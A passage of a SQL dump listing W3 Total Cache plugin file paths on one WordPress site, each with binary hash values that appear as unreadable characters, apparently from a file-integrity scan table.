p(fZp^;O3V-#؟','',0,'?'),('\nE3n','wp-content/plugins/w3-total-cache/Extension_NewRelic_AdminNotes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_AdminNotes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mծ լk=YYL','JYތMjyZWN\\z','',0,'?'),('O]et','wp-content/plugins/w3-total-cache/Extension_NewRelic_Api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{rQ v-wT','vC|92#m\"T[bt-Cו5','',0,'?'),('e͵j','wp-content/plugins/w3-total-cache/Extension_NewRelic_Core.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','حDec~','φj?{r]X8Q ','',0,'?'),('W|&@P?%','wp-content/plugins/w3-total-cache/Extension_NewRelic_GeneralPage.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_GeneralPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','76<0Yt:','bԨ$rWy\"K}1īZ\Zf!r','',0,'?'),('#\nv4ffE2.d','wp-content/plugins/w3-total-cache/Extension_NewRelic_GeneralPage_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_GeneralPage_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','о\ZTM\Z04:','d#%s46Y/\\vReм5J','',0,'?'),('Z\nB|GѦ8%$','wp-content/plugins/w3-total-cache/Extension_NewRelic_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!\"kQ','pE!+|!+dsޚO','',0,'?'),('} 9]TvYD{q','wp-content/plugins/w3-total-cache/Extension_NewRelic_Page_View_Apm.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Page_View_Apm.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xi`8','-WY*ʽuyB女X\0kHld','',0,'?'),('(cg-_ D','wp-content/plugins/w3-total-cache/Extension_NewRelic_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TԼGoL!P','W^rg1ֱ F؏۞4','',0,'?'),('(\n?P','wp-content/plugins/w3-total-cache/Extension_NewRelic_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sw\'?\\EU̚','}b`9igd8\0q$-a','',0,'?'),('D*M`<','wp-content/plugins/w3-total-cache/Extension_NewRelic_Popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 0|Jg8h.','xK?gr%VvvSrH,}uZ2;ZG','',0,'?'),('4]Dx7','wp-content/plugins/w3-total-cache/Extension_NewRelic_Popup_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Popup_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&k\r5lS VZ','kL$Q\Zf#sS٢1M}','',0,'?'),('_3u)Z!\\ EXcb','wp-content/plugins/w3-total-cache/Extension_NewRelic_Popup_View_Intro.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Popup_View_Intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yj*\"1&','\\5Ffm\"bsIFqź\\ˉ','',0,'?'),('ȥd_jPA','wp-content/plugins/w3-total-cache/Extension_NewRelic_Popup_View_ListApplications.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Popup_View_ListApplications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','މ%\'xt #8','FˌRhOj#LZ3co\"\\MY;c','',0,'?'),('vDSk]Q:V\n','wp-content/plugins/w3-total-cache/Extension_NewRelic_Service.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_[]\'\r`{8n','MDZNˎ+;(c#px$TjY\n','',0,'?'),('׫C&A/nJ','wp-content/plugins/w3-total-cache/Extension_NewRelic_Widget.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ښ½ioSRu','2Ho%.ڠϱ]6q1hV','',0,'?'),(' f@I7','wp-content/plugins/w3-total-cache/Extension_NewRelic_Widget_View.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Widget_View.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yG%35X׍]','IѳM]׻ ]={I','',0,'?'),('˾dKٛWFIq','wp-content/plugins/w3-total-cache/Extension_NewRelic_Widget_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Widget_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^MAc ̊ᖢ(',' 0e: [w-h /3O9','',0,'?'),('3pvn{)','wp-content/plugins/w3-total-cache/Extension_NewRelic_Widget_View_Apm.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Widget_View_Apm.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I]g6K9@Ѕ','R:wNYS]WJ :_k~R','',0,'?'),('o\0,\'E0','wp-content/plugins/w3-total-cache/Extension_NewRelic_Widget_View_Browser.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Widget_View_Browser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(6?1vDM9I{','*͈OF|!q-k9\Zbi','',0,'?'),('B%;wb8nLK','wp-content/plugins/w3-total-cache/Extension_NewRelic_Widget_View_NotConfigured.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_Widget_View_NotConfigured.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cd7\'l<8','¬giBELx;$n*\Z.WR3','',0,'?'),('/Gl]}3.S,','wp-content/plugins/w3-total-cache/Extension_Swarmify_AdminActions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Swarmify_AdminActions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' mG5kQj','OW)c\rʷ/2`%irѺ=','',0,'?'),('Ҧ9wVy','wp-content/plugins/w3-total-cache/Extension_Swarmify_Core.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Swarmify_Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}٦{T:','TT;[O%%-1a\n^k[','',0,'?'),('Zc_O[U','wp-content/plugins/w3-total-cache/Extension_Swarmify_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Swarmify_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֐8$gl#','rV%lffH\r5\Z8\0eQ$n','',0,'?'),('̿h[F]o','wp-content/plugins/w3-total-cache/Extension_Swarmify_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Swarmify_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XS;;\0l','V4.4>(ӿlf`8# oaG$/.','',0,'?'),('@!N\'e5Αk]c%','wp-content/plugins/w3-total-cache/Extension_Swarmify_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Swarmify_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']k2O-`','sC.,\'_=&Ѷ=C','',0,'?'),('^z\0U.','wp-content/plugins/w3-total-cache/Extension_Swarmify_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Swarmify_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ljP^Ǔ','~#m[#+\nEΑ','',0,'?'),('b7]0Wbv','wp-content/plugins/w3-total-cache/Extension_Swarmify_Widget.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Swarmify_Widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(}^Usf','+މBs2ea1+bzgE遑/','',0,'?'),('$|aOa?gJ','wp-content/plugins/w3-total-cache/Extension_Swarmify_Widget_View.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Swarmify_Widget_View.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѻ[eoED','JS\'YzpF@8ZoG׾Eˣ@','',0,'?'),('MAF\Z%;?!','wp-content/plugins/w3-total-cache/Extension_Swarmify_Widget_View_NotConfigured.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Swarmify_Widget_View_NotConfigured.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c( bF\n','WG!CGAs&\ZsOū؄ĵ','',0,'?'),('2!6RKe\"','wp-content/plugins/w3-total-cache/Extension_WordPressSeo_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_WordPressSeo_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{~jF','G/wgI^29KOX','',0,'?'),(',u˝xN','wp-content/plugins/w3-total-cache/Extension_WordPressSeo_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_WordPressSeo_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E掓.G-L','\Z\'KMO˟Ӎ@Yą!X*M! ۫','',0,'?'),('pe轹 :','wp-content/plugins/w3-total-cache/Extension_Wpml_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Wpml_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wl\'zH#%K','̝buj+29Ώo*i钦x<,Pi&','',0,'?'),(',wag릥','wp-content/plugins/w3-total-cache/Extension_Wpml_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Wpml_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EMՍ-;\'','p\\6{zhw #ɼ8D7Yf\Z','',0,'?'),('M1xꩬ^Ѕ˅Mf','wp-content/plugins/w3-total-cache/Extensions_AdminActions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extensions_AdminActions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PE','\'̐`%_\0cR@fE','',0,'?'),('gX_u0ǹ5','wp-content/plugins/w3-total-cache/Extensions_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extensions_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϵj5bڂl','h+6: c@zv%Zō5+c','',0,'?'),('&N;q 4\"N]','wp-content/plugins/w3-total-cache/Extensions_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extensions_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}T7o!#UQ','FWu\0pZaË\nn*R','',0,'?'),('A\\.hӜg','wp-content/plugins/w3-total-cache/Extensions_Util.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extensions_Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zR`QX@','vM\nzG5V(cQy!7','',0,'?'),('3Tj&լ*͑','wp-content/plugins/w3-total-cache/FeatureShowcase_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/FeatureShowcase_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\"Tx ','pVPeZcc3k Js>$7_','',0,'?'),('nRh ','wp-content/plugins/w3-total-cache/FeatureShowcase_Plugin_Admin_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/FeatureShowcase_Plugin_Admin_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2{젳',' Č֬cgmAx<=e GW=@','',0,'?'),('erNDZ4A*','wp-content/plugins/w3-total-cache/Generic_AdminActions_Config.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_AdminActions_Config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t]gћ MQ','.cJRs Jr0','',0,'?'),('pn\r@dR','wp-content/plugins/w3-total-cache/Generic_AdminActions_Default.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_AdminActions_Default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AT *un','+U%PJ,p0Jxnf','',0,'?'),('Z279M>\'','wp-content/plugins/w3-total-cache/Generic_AdminActions_Flush.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_AdminActions_Flush.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z!e`Arщ','l,rJ*\ZM\0H[rT3]M','',0,'?'),('e0RP펐p','wp-content/plugins/w3-total-cache/Generic_AdminActions_Test.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_AdminActions_Test.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\nRNnե C','*%l|\nM^QuR%lCMXPWa','',0,'?'),('o n/.e-SEy<','wp-content/plugins/w3-total-cache/Generic_AdminNotes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_AdminNotes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','щ23:=<','B&]kW,\n||]ls/Q','',0,'?'),('@Iɾ!t3','wp-content/plugins/w3-total-cache/Generic_ConfigLabels.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_ConfigLabels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*9qw-(Ȝ','M9֛zQWH,cmG','',0,'?'),('&-Ev','wp-content/plugins/w3-total-cache/Generic_Environment.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Environment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KE+}>R+','o,g%a`+/cGIFWM\\<','',0,'?'),('CuzE#i\n','wp-content/plugins/w3-total-cache/Generic_Faq.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Faq.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݧFwu','4zcA]:uX(ۇ2] ~ijQM','',0,'?'),('aκ+wnpt=','wp-content/plugins/w3-total-cache/Generic_GeneralPage_View_ShowEdge.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_GeneralPage_View_ShowEdge.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lܯ*pb','Q;hY JB&d5 ','',0,'?'),('s~gKs`M`','wp-content/plugins/w3-total-cache/Generic_GeneralPage_View_ShowSupportUs.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_GeneralPage_View_ShowSupportUs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZHP[(!}.','Tg%ҩʮA^pn޹!P','',0,'?'),('h\'tgW/)qr','wp-content/plugins/w3-total-cache/Generic_Page_About.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Page_About.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0;GaA}Ϭ','xu_c1z}1sB>ZQf','',0,'?'),('FkaDYSr','wp-content/plugins/w3-total-cache/Generic_Page_Dashboard.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Page_Dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y][pQ@','ytov;V>SsMϞjqO','',0,'?'),('ًt+ vJ','wp-content/plugins/w3-total-cache/Generic_Page_Dashboard_View.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Page_Dashboard_View.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zȈP4:U.','_;Qr``J00Z%d eA','',0,'?'),('WYebS̷4','wp-content/plugins/w3-total-cache/Generic_Page_General.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Page_General.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o/VLԖ|','iDe1fm&[;޼R9ڱ]','',0,'?'),('(˚8P_X\"3\\','wp-content/plugins/w3-total-cache/Generic_Page_Install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Page_Install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Xn7','HQ4\r2uK\\tD$uI`xt!~r','',0,'?'),('xЦH','wp-content/plugins/w3-total-cache/Generic_Page_PurgeLog.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Page_PurgeLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0s \"(} x ί\"','8( |gِ_+_Cx ','',0,'?'),('lnҪ4 si','wp-content/plugins/w3-total-cache/Generic_Page_PurgeLog_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Page_PurgeLog_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a]a|\"','N%3\Zrt\ZY33ۚ\n)r\r','',0,'?'),('%M0z;.','wp-content/plugins/w3-total-cache/Generic_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uv3:`:\0','T*k@3oФ\'HJt','',0,'?'),('f )洖7ۣ_','wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!]~V^2','fs!bs&$py9sW','',0,'?'),('z\n풝!1','wp-content/plugins/w3-total-cache/Generic_Plugin_AdminCompatibility.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Plugin_AdminCompatibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6s&=- ','UBݙ}PҴc*rUHF','',0,'?'),('r]SmqTy','wp-content/plugins/w3-total-cache/Generic_Plugin_AdminNotifications.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Plugin_AdminNotifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f Ռq^','\" t`GԵ_Gƪej_ ','',0,'?'),('CEz@\"v~)','wp-content/plugins/w3-total-cache/Generic_Plugin_AdminRowActions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Plugin_AdminRowActions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tؘe|lE` ','$\'?hѵH\'9 *\"GU','',0,'?'),('K4 \ra!','wp-content/plugins/w3-total-cache/Generic_Plugin_Admin_View_Faq.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin_View_Faq.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S8C{\Z J]','CԯpMǶWQGx$c\'','',0,'?'),('7yG.d2{ʍ','wp-content/plugins/w3-total-cache/Generic_Plugin_WidgetForum.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Plugin_WidgetForum.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dJ{J\r7p3I{','b8oC\Z&&wV(gb\\:>\0','',0,'?'),('\"!6\n }M<4','wp-content/plugins/w3-total-cache/Generic_Plugin_WidgetNews.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_Plugin_WidgetNews.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u8GO3RI','|+MK.ժŗ}qV','',0,'?'),('S_j|a\0<ئ<*9','wp-content/plugins/w3-total-cache/Generic_WidgetBoldGrid.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_WidgetBoldGrid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\TO SDY6','0(v4JȪ`k0o,-h-','',0,'?'),('EZ%%O','wp-content/plugins/w3-total-cache/Generic_WidgetBoldGrid_AdminActions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_WidgetBoldGrid_AdminActions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I E4E','DE#΂nٌPLyZ\'L^gegk','',0,'?'),('-ĚARe','wp-content/plugins/w3-total-cache/Generic_WidgetBoldGrid_Logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_WidgetBoldGrid_Logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i|@@eb','r񸞴\'_DÞpc±ܪHR;\Z','',0,'?'),('I\\ O\"Tߛ0U+|L','',0,'?'),('^17An>K9','wp-content/plugins/w3-total-cache/Generic_WidgetServices_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_WidgetServices_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uػ)ld','F@~kcŕQzr\rZ4.','',0,'?'),('\rc','wp-content/plugins/w3-total-cache/Generic_WidgetSpreadTheWord.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_WidgetSpreadTheWord.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DA4^Nd\0q','*|Ԓ-c1I>\'\"\07','',0,'?'),('rUn-U%j4h ','wp-content/plugins/w3-total-cache/Generic_WidgetSpreadTheWord_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_WidgetSpreadTheWord_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','phbBu','TRS).waİd{\0i#nK','',0,'?'),('>3k- &','wp-content/plugins/w3-total-cache/Generic_WidgetSpreadTheWord_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Generic_WidgetSpreadTheWord_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2ґڸ9Е','/ȱb##.ZcW.&p9','',0,'?'),('#ܩzk}`]','wp-content/plugins/w3-total-cache/LICENSE','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4MiHjJBc','\0v1sN>cID٦I0-','',0,'?'),('\n! ][ic%\\','wp-content/plugins/w3-total-cache/Licensing_AdminActions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Licensing_AdminActions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^²[$}Y\ZSo','\Zk?\nwjqؗ&3 VP*ئ6`,','',0,'?'),('fb ','wp-content/plugins/w3-total-cache/Licensing_Core.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Licensing_Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DZɢb2','ng OGߝD\Z  K\"#P','',0,'?'),('fܾmh{','wp-content/plugins/w3-total-cache/Licensing_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Licensing_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!2Mdp1VV','N[nZ7۶mG:łh`B<','',0,'?'),('1il\r\\t4LT','wp-content/plugins/w3-total-cache/Minify_AutoCss.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Minify_AutoCss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!qw4 Jf=&','FK\ZHOCjC&&ѐ܅ڦ8','',0,'?'),('V#M/D 3\n[','wp-content/plugins/w3-total-cache/Minify_AutoJs.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Minify_AutoJs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r_eVlhjěO','Mo\0.kJ \n!\"8`$̒\\\\\r','',0,'?'),('IW`/ΑB]q<','wp-content/plugins/w3-total-cache/Minify_ConfigLabels.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Minify_ConfigLabels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0*zNu','2p L bp~q{e\rNvx.= ','',0,'?'),('{_+hKsc~','wp-content/plugins/w3-total-cache/Minify_ContentMinifier.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Minify_ContentMinifier.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v}z;\\$ yl','&\"*. wdNaP ,0ciȖ','',0,'?'),('p fA9vRm ','wp-content/plugins/w3-total-cache/Minify_Core.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Minify_Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9=zM}j','\"QI͝DG\rǏi}d!\':V ','',0,'?'),(' J[7b\0]YQ','wp-content/plugins/w3-total-cache/Minify_Environment.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Minify_Environment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l*}j\'_ISJ','tO\Z sN+kt-P2H/V<>ލ','',0,'?'),('\\h= ','',0,'?'),('Ӟb=־1mw','wp-content/plugins/w3-total-cache/Mobile_UserAgent.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Mobile_UserAgent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(H4a%Gf/','ApT徺91_ \\!u','',0,'?'),('08^5 ?ŐK ','wp-content/plugins/w3-total-cache/ModuleStatus.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ModuleStatus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/u\\η','u^ZLj͊&ٝJ^ch%:','',0,'?'),('\'dMWrSFyD]','wp-content/plugins/w3-total-cache/ObjectCache_ConfigLabels.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ObjectCache_ConfigLabels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PHL0 \'N','^{pz$]Rѯp}68','',0,'?'),(')q;lpE O','wp-content/plugins/w3-total-cache/ObjectCache_Environment.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ObjectCache_Environment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=3\0b_eP','s=|{l{e,o$}7Vm','',0,'?'),('Fy{$O\\','wp-content/plugins/w3-total-cache/ObjectCache_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ObjectCache_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"ǽq߅1','/DIV. \\}X%FNrʬO','',0,'?'),('y@\\\\н','wp-content/plugins/w3-total-cache/ObjectCache_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ObjectCache_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HW| ; Wte',' y㪰av-W/!S','',0,'?'),('\0\n3r','wp-content/plugins/w3-total-cache/ObjectCache_WpObjectCache.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ObjectCache_WpObjectCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[d.\"X^',' vfF8΃̹\\uN/H=_','',0,'?'),('\Z٤3[>c','wp-content/plugins/w3-total-cache/ObjectCache_WpObjectCache_Regular.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ObjectCache_WpObjectCache_Regular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dD>\ZZ:','kvH\0xJ,= yvgu\'','',0,'?'),('j\n TTk.','wp-content/plugins/w3-total-cache/PageSpeed_Api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/PageSpeed_Api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.s4ɉ 